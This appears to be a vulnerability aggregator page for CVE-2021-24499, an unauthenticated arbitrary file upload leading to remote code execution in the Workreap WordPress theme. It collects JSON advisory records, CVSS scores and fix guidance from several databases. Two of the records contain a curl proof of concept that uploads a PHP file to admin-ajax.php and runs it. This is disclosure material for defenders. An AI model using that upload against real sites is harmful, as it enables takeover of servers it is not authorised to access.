Description
In the Workreap WordPress theme before 2.2.2, the AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks or validate in any other way that the request came from a valid user. The endpoints allowed arbitrary files to be uploaded to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as PHP scripts. The issue is fixed in version 2.2.2; sites that ran an earlier version should update and review uploads/workreap-temp for unexpected executable files such as .php scripts.
**Recent assessments:**
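Assessed Attacker Value: 0
Note: a value of 0 most likely means the topic has not been assessed yet, not that it is low risk; the record below rates the issue CVSS 3.1 9.8 (Critical) and marks it as exploited in the wild.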
Related
{"id": "AKB:5D1F0063-0535-424F-9AE0-F6F480281FB5", "vendorId": null, "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2021-24499", "description": "The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "published": "2021-08-09T00:00:00", "modified": "2021-08-18T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/I6sadAsrbZ/cve-2021-24499", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24499", 
"https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/"], "cvelist": ["CVE-2021-24499"], "immutableFields": [], "lastseen": "2022-05-06T23:41:52", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0855"]}, {"type": "cve", "idList": ["CVE-2021-24499"]}, {"type": "githubexploit", "idList": ["DAE27094-1C7A-5109-A7EB-13BD9B999C42"]}, {"type": "wpexploit", "idList": ["WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}], "rev": 4}, "score": {"value": 5.6, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2021-0855"]}, {"type": "cve", "idList": ["CVE-2021-24499"]}, {"type": "githubexploit", "idList": ["DAE27094-1C7A-5109-A7EB-13BD9B999C42"]}, {"type": "wpexploit", "idList": ["WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB"]}]}, "exploitation": null, "vulnersScore": 5.6}, "_state": {"wildexploited": 0, "dependencies": 0}, "_internal": {"wildexploited_cvelist": ["CVE-2021-24499"]}, "attackerkb": {"attackerValue": 0, "exploitability": 0}, "wildExploited": true, "wildExploitedCategory": {"News Article or Blog": ""}, "wildExploitedReports": [{"category": "News Article or Blog", "source_url": "https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/", "published": "2022-01-10T16:52:00"}], "references_categories": {"Canonical": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24499"], "Miscellaneous": ["https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/"]}, "tags": [], "mitre_vector": {}, "last_activity": "2022-01-10T16:52:00"}
{"githubexploit": [{"lastseen": "2022-05-09T09:27:15", "description": "# CVE-2021-24499\nMass exploitation of CVE-2021-24499 unauthentic...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-12T12:43:24", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Amentotech Workreap", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2022-05-09T06:49:59", "id": "DAE27094-1C7A-5109-A7EB-13BD9B999C42", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "wpvulndb": [{"lastseen": "2021-09-14T23:13:17", "description": "The theme's AJAX actions `workreap_award_temp_file_uploader` and `workreap_temp_file_uploader` did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. 
Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n\n### PoC\n\n% curl -F 'action=workreap_award_temp_file_uploader' -F award_img=@malicious.php 'http://example.com/wp-admin/admin-ajax.php' {\"type\":\"success\",\"message\":\"File uploaded!\",\"thumbnail\":\"http:\\/\\/example.com\\/wp-content\\/uploads\\/workreap-temp\\/malicious.php\",\"name\":\"malicious.php\",\"size\":\"24.00 B\"} % curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php' PWNED!\n", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "wpvulndb", "title": "Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-11T10:09:21", "id": "WPVDB-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB", "href": "https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:06", "description": "A remote code execution vulnerability exists in WordPress Workreap theme. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-28T00:00:00", "type": "checkpoint_advisories", "title": "WordPress Workreap Theme Remote Code Execution (CVE-2021-24499)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-11-28T00:00:00", "id": "CPAI-2021-0855", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-09-14T23:13:17", "description": "The theme's AJAX actions `workreap_award_temp_file_uploader` and `workreap_temp_file_uploader` did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. 
Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.\n", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "wpexploit", "title": "Workreap < 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-11T10:09:21", "id": "WPEX-ID:74611D5F-AFBA-42AE-BC19-777CDF2808CB", "href": "", "sourceData": "% curl -F 'action=workreap_award_temp_file_uploader' -F award_img=@malicious.php 'http://example.com/wp-admin/admin-ajax.php'\r\n{\"type\":\"success\",\"message\":\"File uploaded!\",\"thumbnail\":\"http:\\/\\/example.com\\/wp-content\\/uploads\\/workreap-temp\\/malicious.php\",\"name\":\"malicious.php\",\"size\":\"24.00 B\"}\r\n\r\n% curl 'http://example.com/wp-content/uploads/workreap-temp/malicious.php'\r\nPWNED!", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:55:52", "description": "The Workreap WordPress theme before 2.2.2 AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. 
Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T10:15:00", "type": "cve", "title": "CVE-2021-24499", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-09-21T17:10:00", "cpe": [], "id": "CVE-2021-24499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24499", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "patchstack": [{"lastseen": "2022-06-01T19:31:37", "description": "Unauthenticated Upload vulnerability leading to Remote Code Execution (RCE) discovered by Harald Eilertsen (Jetpack) in WordPress Workreap premium theme (versions <= 2.2.1).\n\n## Solution\n\n\r\n Update the WordPress Workreap premium theme to the latest available version (at least 2.2.2).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", 
"availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "patchstack", "title": "WordPress Workreap premium theme <= 2.2.1 - Unauthenticated Upload vulnerability leading to Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24499"], "modified": "2021-07-02T00:00:00", "id": "PATCHSTACK:96799EA0C5FA1F563AA31CB3EABCB62E", "href": "https://patchstack.com/database/vulnerability/workreap/wordpress-workreap-premium-theme-2-2-1-unauthenticated-upload-vulnerability-leading-to-remote-code-execution-rce", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}